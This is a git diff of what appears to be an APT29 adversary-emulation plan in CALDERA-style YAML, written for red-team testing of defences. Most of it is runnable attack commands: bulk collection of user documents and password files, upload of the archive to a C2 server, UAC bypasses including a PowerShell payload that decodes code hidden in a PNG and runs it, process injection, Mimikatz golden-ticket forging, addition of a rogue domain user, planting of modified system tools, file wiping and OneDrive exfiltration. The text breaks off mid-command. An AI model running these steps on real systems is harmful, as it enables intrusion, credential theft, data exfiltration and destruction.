OneDrive net drive + type: URL + default: https://contoso-my.sharepoint.com/personal/johnd_contoso_onmicrosoft_com/ + + onedrive.username: + description: Username for OneDrive authentication + type: string + default: Administrator + + onedrive.password: + description: Password for OneDrive authentication + type: string + default: Password123! + + executors: + - name: powershell + command: | + $err = $(net use y: #{onedrive.url} /user:#{onedrive.username} "#{onedrive.password}" 2>&1); + if($err -Like "*System error 85*") { + Write-Host "OneDrive net drive is already mounted!"; + } elseif($err -Like "*System error 67*") { + Write-Host "OneDrive net drive mount failed - Check URL!"; + Write-Host "#{onedrive.url}"; + exit 1; + } elseif($err -Like "*System error 1244*") { + Write-Host "Could not authenticate to OneDrive - Check Creds!"; + Write-Host "User: #{onedrive.username}"; + Write-Host "Password: #{onedrive.password}"; + exit 1; + } + + Write-Host "Mount Successful" + Copy-Item "C:\Windows\Temp\WindowsParentalControlMigration.tmp" -Destination "y:\WindowsParentalControlMigration.tmp" -Force; + if(!$?){ + exit 1; + } + + Write-Host "Copy Successfull" + exit 0; + +# Step 19 - Cleanup + +- id: f820b93d-6176-4a72-a138-a70b0b549c49 + name: Data Wiping of staged files + description: Securely delete previously staged files. + tactic: impact + technique: + attack_id: T1561.001 + name: "Disk Wipe: Disk Content Wipe" + cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + procedure_group: procedure_impact + procedure_step: "19.A-19.C" + platforms: + windows: + psh,pwsh: + command: | + . .\wipe.ps1; + wipe "m.exe"; + wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; + wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; + payloads: + - wipe.ps1 + + executors: + - name: powershell + command: | + . .\wipe.ps1; + wipe "m.exe"; + wipe "C:\Windows\Temp\WindowsParentalControlMigration.tmp"; + wipe "C:\Windows\Temp\WindowsParentalControlMigration\MITRE-ATTACK-EVALS.HTML"; + +# Step 20 - Leverage Persistence +# 20.A and 20.B were switched in original adversary profile. +- id: 267bad86-3f06-49f1-9a3e-6522f2a61e7a + name: Execute Invoke-Mimikatz + description: Perfofrm Mimikatz credential collection + tactic: credential-access + technique: + attack_id: T1003 + name: "Credential Dumping" + cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" + procedure_group: procedure_cred_access + procedure_step: "20.B" + platforms: + windows: + psh,pwsh: + command: | + klist purge; + . .\Invoke-Mimikatz.ps1; + invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; + klist; + invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; + payloads: + - Invoke-Mimikatz.ps1 + + input_arguments: + target.domain.name: + description: Target domain name + type: string + default: domain + + target.sid: + description: SID for target user + type: string + default: S-1-5-21-1004336348-1177238915-682003330-512 + + target.ntlm: + description: NTLM hash for target user + type: string + default: 855c3697d9979e78ac404c4ba2c66533 + + target.winrm.username: + description: Username for winrm target user + type: string + default: Administrator + + executors: + - name: powershell + command: | + klist purge; + . .\Invoke-Mimikatz.ps1; + invoke-mimikatz -command "kerberos::golden /domain:#{target.domain.name} /sid:#{target.sid} /rc4:#{target.ntlm} /user:#{target.winrm.username} /ptt"; + klist; + invoke-command -ComputerName scranton -ScriptBlock {net user /add toby "pamBeesly<3"}; + +- id: afb8d8f7-d059-4825-95ae-c5727e2db320 + name: Triggering Persistent + description: Trigger RegKey persistence by rebooting the machine + tactic: persistence + technique: + attack_id: T1218.011 + name: "Signed Binary Proxy Execution: Rundll32" + cti_source: "https://www.fireeye.com/blog/products-and-services/2019/02/state-of-the-hack-no-easy-breach-revisited.html" + procedure_group: procedure_persistence + procedure_step: "20.A" + platforms: + windows: + psh,pwsh: + command: | + Restart-Computer -Force; + + executors: + - name: powershell + command: | + Restart-Computer -Force; diff --git a/apt29/Emulation_Plan/yaml/APT29.yaml b/apt29/Emulation_Plan/yaml/APT29.yaml deleted file mode 100644 index 7f23eb7d..00000000 --- a/apt29/Emulation_Plan/yaml/APT29.yaml +++ /dev/null @@ -1,2809 +0,0 @@ -# APT29.yaml - CALDERA and Atomic style TTPs - -- emulation_plan_details: - id: 4975696e-1d41-11eb-adc1-0242ac120002 - adversary_name: APT29 - adversary_description: APT29 is a threat group that has been attributed to the Russian government who have been in operation since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. - attack_version: 8.1 - format_version: 1.0 - -# Scenario 1 - -# Step 1 - Initial Breach - -- id: 571845f6-b75c-4b9d-a666-a78f7827261f - name: RTLO Start Sandcat - description: Perform RTLO technique with SANDCAT - tactic: execution - technique: - attack_id: T1036.002 - name: "Masquerading: Right-to-Left Override" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163405/CosmicDuke.pdf" - procedure_group: procedure_execution - procedure_step: "1.A" - platforms: - windows: - psh,pwsh: - command: | - Sleep 3; - $bin = Get-ChildItem *cod*scr*; - $arguments = '-server "#{server}" -group "rtlo_group"'; - start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; - - if ($?) { - write-host "Successfully completed RTLO execution. A new agent should appear"; - exit 0; - - } else { - write-host "Failure of RTLO execution."; - exit 1; - } - payloads: - - cod.3aka3.scr - - input_arguments: - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Sleep 3; - $bin = Get-ChildItem *cod*scr*; - $arguments = '-server "#{server}" -group "rtlo_group"'; - start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments; - - if ($?) { - write-host "Successfully completed RTLO execution. A new agent should appear"; - exit 0; - - } else { - write-host "Failure of RTLO execution."; - exit 1; - } - -- id: a5daa530-c640-49bc-aa54-6808789a684a - name: PowerShell - description: Spawn powershell.exe from cmd.exe - tactic: execution - technique: - attack_id: T1059.001 - name: "Command and Scripting Interpreter: PowerShell" - cti_source: "https://securelist.com/the-cozyduke-apt/69731/" - procedure_group: procedure_execution - procedure_step: "1.B" - platforms: - windows: - cmd: - command: | - powershell.exe; - if ($?) { - write-host "[*] PowerShell successfully spawned"; - exit 0; - } - - executors: - - name: command_prompt - command: | - powershell.exe; - if ($?) { - write-host "[*] PowerShell successfully spawned"; - exit 0; - } - -# Step 2 - Rapid Collection and Exfiltration - -- id: 5692da31-3586-4e4f-8f07-5750070c730b - name: Automated Collection - description: Execute PowerShell from cmd.exe to collect and compress files of specific extensions. - tactic: collection - technique: - attack_id: T1119 - name: "Automated Collection" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_collection - procedure_step: "2.A.1" - platforms: - windows: - psh,pwsh: - command: | - $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force - - executors: - - name: powershell - command: | - $env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force - -- id: ee08a427-1e1d-4d8a-aeb1-978a7fcf9087 - name: System Network Configuration Discovery - description: The ipconfig utility is executed via cmd to enumerate local TCP/IP network configuration information. - tactic: discovery - technique: - attack_id: T1016 - name: "System Network Configuration Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.A.2" - platforms: - windows: - cmd: - command: | - ipconfig /all - - executors: - - name: command_prompt - command: | - ipconfig /all - -- id: 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce - name: System Network Configuration Discovery - description: The arp utility is executed via cmd to enumerate local ARP configuration information. - tactic: discovery - technique: - attack_id: T1016 - name: "System Network Configuration Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.A.3" - platforms: - windows: - cmd: - command: | - arp -a - - executors: - - name: command_prompt - command: | - arp -a - -- id: 35d95b64-c1f8-4ac7-a2f2-8959218239cd - name: System Owner / User Discovery - description: The native echo command is executed via cmd to enumerate local environment variables associated with current user and domain. - tactic: discovery - technique: - attack_id: T1033 - name: "System Owner/User Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.B.1" - platforms: - windows: - cmd: - command: | - echo %USERDOMAIN%\%USERNAME% - - executors: - - name: command_prompt - command: | - echo %USERDOMAIN%\%USERNAME% - -- id: 68e209dd-f354-4adc-8bc6-e85a3e55a7f4 - name: Data from staged fileand Exfiltration over C2 Channel - description: Copy a target file from a remote file share through the existing C2 channel - tactic: exfiltration - technique: - attack_id: T1041 - name: "Exfiltration Over Command and Control Channel" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_exfiltration - procedure_step: "2.B.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; - payloads: - - upload.ps1 - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "C:\Users\#{profile_user}\AppData\Roaming\Draft.zip" -Uri "#{server}/file/upload"; - -- id: 5df12481-9d8c-4235-b550-9cefc8ed7361 - name: Process Discovery - description: API call(s) are executed to enumerate local running processes. - tactic: discovery - technique: - attack_id: T1057 - name: "Process Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.C.1" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\ps.ps1 -Verbose -Force; - ProcessList - payloads: - - ps.ps1 - - executors: - - name: powershell - command: | - Import-Module .\ps.ps1 -Verbose -Force; - ProcessList - -- id: 41610306-087c-4c34-874b-37b8ed633a36 - name: Process Discovery - description: The tasklist utility is executed via cmd to enumerate local running processes. - tactic: discovery - technique: - attack_id: T1057 - name: "Process Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.C.2" - platforms: - windows: - cmd: - command: | - tasklist /v - - executors: - - name: command_prompt - command: | - tasklist /v - -- id: 2ff877b4-0c00-401e-9d3f-070c70b610df - name: System Service Discovery - description: The sc utility is executed via cmd to enumerate local active services. - tactic: discovery - technique: - attack_id: T1007 - name: "System Service Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.D.1" - platforms: - windows: - cmd: - command: | - sc query - - executors: - - name: command_prompt - command: | - sc query - -- id: 144b1384-5060-494f-80eb-91772695cdf3 - name: System Service Discovery - description: The net utility is executed via cmd to enumerate local active services. - tactic: discovery - technique: - attack_id: T1007 - name: "System Service Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.D.2" - platforms: - windows: - cmd: - command: | - net start - - executors: - - name: command_prompt - command: | - net start - -- id: d2ea2676-7f85-4228-b980-ab3c0e1adc03 - name: System Information Discovery - description: The systeminfo utility is executed via cmd to enumerate local operating system configuration. - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.E.1" - platforms: - windows: - cmd: - command: | - systeminfo - - executors: - - name: command_prompt - command: | - systeminfo - -- id: 7c2a6e5b-1adb-464f-a581-4677391f8dd6 - name: System Information Discovery - description: The net utility is executed via cmd to enumerate local operating system configuration. - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.E.2" - platforms: - windows: - cmd: - command: | - net config workstation - - executors: - - name: command_prompt - command: | - net config workstation - -- id: faa96e7f-081a-40b7-a743-a6a7f2627ea3 - name: Permissions Groups Discovery - description: The net utility is executed via cmd to enumerate members of the local system's administrators group. - tactic: discovery - technique: - attack_id: T1069 - name: "Permission Groups Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.F.1" - platforms: - windows: - cmd: - command: | - net localgroup administrators - - executors: - - name: command_prompt - command: | - net localgroup administrators - -- id: 26181249-be75-41ed-9fe7-5c30ea8c2d4d - name: Permissions Groups Discovery - description: The net utility is executed via cmd to enumerate members of the domain controller’s administrators group. - tactic: discovery - technique: - attack_id: T1069 - name: "Permission Groups Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.F.2" - platforms: - windows: - cmd: - command: | - net localgroup administrators /domain - - executors: - - name: command_prompt - command: | - net localgroup administrators /domain - -- id: 84377d7a-0363-44fd-a082-44657ca1858f - name: Permissions Groups Discovery - description: The net utility is executed via cmd to enumerate members of the domain administrators group. - tactic: discovery - technique: - attack_id: T1069 - name: "Permission Groups Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.F.3" - platforms: - windows: - psh,pwsh: - command: | - cmd.exe /c net group "Domain Admins" /domain - - executors: - - name: powershell - command: | - cmd.exe /c net group "Domain Admins" /domain - -- id: 61221fb9-cb32-46d5-98fd-90567a621526 - name: Account Discovery - description: The net utility is executed via cmd to enumerate domain user accounts. - tactic: discovery - technique: - attack_id: T1087 - name: "Account Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.G.1" - platforms: - windows: - cmd: - command: | - net user /domain - - executors: - - name: command_prompt - command: | - net user /domain - -- id: 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76 - name: Account Discovery - description: The net utility is executed via cmd to enumerate detailed information about a specific user account. - tactic: discovery - technique: - attack_id: T1087 - name: "Account Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.G.2" - platforms: - windows: - cmd: - command: | - net user %USERNAME% /domain - - executors: - - name: command_prompt - command: | - net user %USERNAME% /domain - -- id: 5c23f638-9cfc-4fc4-9cab-4af628fef70a - name: Query Registry - description: The reg utility is executed via cmd to enumerate a specific Registry key associated with local system policies to ensure that the user will not be prompted for credentials when elevating permissions. - tactic: discovery - technique: - attack_id: T1012 - name: "Query Registry" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "2.H.1" - platforms: - windows: - cmd: - command: | - reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - - executors: - - name: command_prompt - command: | - reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - -# Step 3 - Deploy Stealth Toolkit -- id: 68b588bc-002a-42dc-bac7-9189f944065b - name: Staging monkey PNG - description: Staging PNG for Lateral Movement - tactic: defensive-evasion - technique: - attack_id: T1036.005 - name: "Masquerading: Match Legitimate Name or Location" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_def_evasion - procedure_step: "3.A.1" - platforms: - windows: - psh,pwsh: - command: | - $username="#{profile_user}"; - if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { - copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; - if ($? -eq $True) { - write-host "[+] Successfully copied monkey.png!"; - get-childitem -path "C:\Users\$username\Downloads\\"; - exit 0; - } else { - write-host "[+] Failed to copy monkey.png."; - exit 1; - } - - } else { - write-host "[*] monkey.png already exists within C:\users\$username\Downloads..." - } - payloads: - - monkey.png - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - $username="#{profile_user}"; - if ( $(test-path -path "C:\Users\$username\Downloads\monkey.png") -eq $false ) { - copy-item monkey.png -Destination "C:\Users\$username\Downloads\\" -Force; - if ($? -eq $True) { - write-host "[+] Successfully copied monkey.png!"; - get-childitem -path "C:\Users\$username\Downloads\\"; - exit 0; - } else { - write-host "[+] Failed to copy monkey.png."; - exit 1; - } - -- id: 1345bff7-6f26-43b2-a92a-9aabccdb3db0 - name: Bypass User Account Control - description: A UAC bypass technique is executed to steal the token of an existing high-integrity process and launch a new, high-integrity RAT with limited functionality. - tactic: privilege-escalation - technique: - attack_id: T1134.001 - name: "Access Token Manipulation: Token Impersonation/Theft" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_privesc - procedure_step: "3.A.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force; - Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; - $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); - Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose - payloads: - - update.ps1 - - Invoke-BypassUACTokenManipulation.ps1 - - input_arguments: - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force; - Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; - $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); - Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose - -- id: 89e9dffa-8836-4672-8cf3-bebd006d2a2b - name: UAC Bypass via Backup Utility - description: Modify registry values of sdclt to bypass UAC - tactic: privilege-escalation - technique: - attack_id: T1548.002 - name: "Abuse Elevation Control Mechanism: Bypass User Account Control" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_privesc - procedure_step: "3.A.3" - platforms: - windows: - psh,pwsh: - command: | - if (!(test-path -path $env:windir\system32\sdclt.exe)) { - write-host "[!] sdclt.exe was not found on this host."; - exit 1; - } - New-Item -Path HKCU:\Software\Classes -Name Folder -Force; - New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; - New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; - New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; - - $username="#{profile_user}"; - $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; - - Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; - Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; - - cmd.exe /c sdclt.exe; - cmd.exe /c powershell.exe; - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - if (!(test-path -path $env:windir\system32\sdclt.exe)) { - write-host "[!] sdclt.exe was not found on this host."; - exit 1; - } - New-Item -Path HKCU:\Software\Classes -Name Folder -Force; - New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force; - New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force; - New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force; - - $username="#{profile_user}"; - $payload='powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName "System.Drawing"; $g=a System.Drawing.Bitmap("C:\Users\$($username)\Downloads\monkey.png");$o=a Byte[] 4480;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3932]))"'; - - Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)" -Value $payload -Force; - Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Value "" -Force; - - cmd.exe /c sdclt.exe; - cmd.exe /c powershell.exe; - -- id: 5ff80022-8d85-410b-b868-6c7565b267e5 - name: Registry Cleanup for UAC Bypass Technique - description: Delete registry entries post-UAC bypass. - tactic: defensive-evasion - technique: - attack_id: T1112 - name: "Modify Registry" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_def_evasion - procedure_step: "3.B" - platforms: - windows: - psh,pwsh: - command: | - Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; - if (!(test-path -path HKCU:\Software\Classes\Folder)) { - write-host "[+] Reg keys removed!"; - } - - executors: - - name: powershell - command: | - Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force; - if (!(test-path -path HKCU:\Software\Classes\Folder)) { - write-host "[+] Reg keys removed!"; - } - -- id: 088b8639-3f37-42cc-9dc8-01aabb645461 - name: Process Injection - description: The limited functionality high-integrity RAT will inject malicious code into an existing fully functional high-integrity process, resulting in a new elevated, fully functional high-integrity RAT. - tactic: privilege-escalation - technique: - attack_id: T1055 - name: "Process Injection" - cti_source: "https://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016" - procedure_group: procedure_privesc - procedure_step: "3.C" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\Invoke-PSInject.ps1 -Verbose -Force; - Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; - $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); - Inject -PoshCode $pcode; - payloads: - - update.ps1 - - Invoke-PSInject.ps1 - - input_arguments: - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\Invoke-PSInject.ps1 -Verbose -Force; - Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force; - $pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('#{server}')")); - Inject -PoshCode $pcode; - -# Step 4 - Defense Evasion and Discovery - -- id: 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d - name: Planting Modified Sysinternals Utilities - description: Uploading payloads masquerading as via modified SysInternalsSuite - tactic: stage-capabilities - technique: - attack_id: T1036.005 - name: "Masquerading: Match Legitimate Name or Location" - cti_source: "N/A" - procedure_group: procedure_staging - procedure_step: "4.A.1" - platforms: - windows: - psh,pwsh: - command: | - iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; - Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; - - if (! $?) { - write-host "Error moving files to #{profile_user}\Downloads"; - exit 1; - } - - Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; - Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; - - if (! $?) { - write-host "Error expanding files to #{profile_user}\Downloads"; - exit 1; - } - - $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; - if ($dir_exists -eq $true) { - write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; - Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - } else { - mkdir "C:\Program Files\SysInternalsSuite"; - Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - } - - if (test-path -path "SysInternalsSuite.zip") { - Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { - remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { - remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { - Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if ($?) { - gci; - write-host "[*] Successfully planted files" - } else { - write-host "[!] Error downloading and planting modified system tools." - } - - payloads: - - Modified-SysInternalsSuite.zip - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - executors: - - name: powershell - command: | - iwr -uri "https://download.sysinternals.com/files/SysinternalsSuite.zip" -outfile SysInternalsSuite.zip; - Expand-Archive -Path SysInternalsSuite.zip -DestinationPath "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -Force; - - if (! $?) { - write-host "Error moving files to #{profile_user}\Downloads"; - exit 1; - } - - Move-Item Modified-SysInternalsSuite.zip "C:\Users\#{profile_user}\Downloads" -Force; - Expand-Archive -LiteralPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -DestinationPath "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -Force; - - if (! $?) { - write-host "Error expanding files to #{profile_user}\Downloads"; - exit 1; - } - - $dir_exists=Test-Path -path "C:\Program Files\SysInternalsSuite"; - if ($dir_exists -eq $true) { - write-host "[*] SysInternalsSuite folder exists within \"C:\Program Files\", copying over payloads then removing folder from Downloads."; - Move-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - Move-Item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - } else { - mkdir "C:\Program Files\SysInternalsSuite"; - Copy-Item -Path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - Copy-Item -Path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite\\*" -Destination "C:\Program Files\SysInternalsSuite\\" -Force; - } - - if (test-path -path "SysInternalsSuite.zip") { - Remove-Item -path "filesystem::SysInternalsSuite.zip" -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" ) { - remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite.zip" -force; - } - - if (test-path -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite") { - remove-item -path "C:\Users\#{profile_user}\Downloads\Modified-SysInternalsSuite" -recurse -force; - } - - if (test-path -path 